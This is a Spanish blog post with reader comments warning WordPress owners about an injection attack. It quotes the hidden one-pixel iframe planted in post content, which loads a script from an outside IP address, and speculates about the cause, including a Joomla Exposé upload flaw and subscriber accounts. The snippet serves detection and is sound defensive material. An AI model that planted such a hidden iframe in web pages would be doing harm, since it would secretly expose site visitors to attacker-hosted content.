Ayer tadaba mucho en cargar este blog (más de lo normal), cuando me fijé que en la barra de estado ponía «Esperando a 61.132.75.71…» y como no pensé, WTF!?

Rebuscando un poco, parace ser que es un fallo que afecta a varias versiones de WordPress (incluyendo la 2.3.1) y todavía no ha salido ningún parche ni actualización para este bug que están explotando desde China. Si alguien tiene alguna pista o ha localizado algo raro en sus logs, que haga el favor de enviarlo al ticket abierto en WordPress para ver si encuentran por donde se esta produciendo este ataque.

Para saber si nos han inyectado este código en nuestro blog, sólo tenemos que buscar la siguiente IP: 61.132.75.71, dentro del contenido de nuestros posts, donde veremos un código como este:
<!-- Traffic Statistics -->
<iframe src=http://61.132.75.71/iframe/wp-stats.php width=1 height=1 frameborder=0></iframe>
<!-- End Traffic Statistics -->

Este código está dentro del contenido y no de los templates, y hay gente que lleva sufriendo estos ataques desde hace un mes. También gente que usa Joomla, se están quejando del mismo fallo, aunque aquí parece estar relacionado con el módulo Exposé (una galería de imagenes) y los archivos administrator/components/com_expose/uploadimg.php y uploadimage.php.

  1. Estoy en ello, pero los de esta noche no los tendré hasta mañana…de momento he parcheado el wp-app.php como comentas en tu web, aunque si el bug (o posible bug) afecta a la 2.3.1 como comentan por WP no creo que sirva de mucho de momento.

    Un saludo y gracias!

  2. Hola fermuned,

    Gracias por el aviso del fallo, ahora (al igual que de seguro el buen alex) estaremos buscando posibles causas, repercusiones y claro la solución.

    Sin embargo creo tener el problema o la posible fuga de donde venga…

    He revisado el post y he seguido a todos los usuarios que han reportado ataques a su web (incluida la tuya) y todas tienen un mismo factor:
    -> Registro de Usuarios (subscriptores).

    No he visto ningún reporte que me indique lo contrario, así que de seguro este es un problema relacionado con usuarios registrados como subscriptores y no con usuarios normales (o visitantes).
    así que de seguro checando por tu lista de subscriptores encontraras algun ser extraño que se ha colado (registrado) y con ese privilegio (minimo) ha logrado postear el iframe…

    Tocara investigar mas y claro hacer el parche (si es que lo amerita) asi que por el momento todo me indica hacia ese lado que ya mencione..

    Saludos

  3. Hola g30rg3_x, gacias por tu interés!

    He estado dando vueltas a lo de los usuarios, y no descarto que haya sido ese el método (via WordPress).
    El caso es que he visto que tengo 3 usuarios registrados (poset97qq, domi95bin4 y xdfsd45oi) que eran para aprovechar una vulnerabilidad anterior (http://www.shellscript.co.uk/2007/08/26/oh-no-not-again/) y no se si pueden estar involucrados en este nuevo caso.

    Por los demás usuarios, poco hay que añadir: son pocos y no hay nota de su accesso en los logs el día de lo ocurrido.

    Cualquier consejo/ayuda será bienvenida.
    Un saludo!

Leave a Reply to alex Cancel Reply

Tu dirección de correo electrónico no será publicada. Los campos necesarios están marcados *

You may use these HTML tags and attributes:

<a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>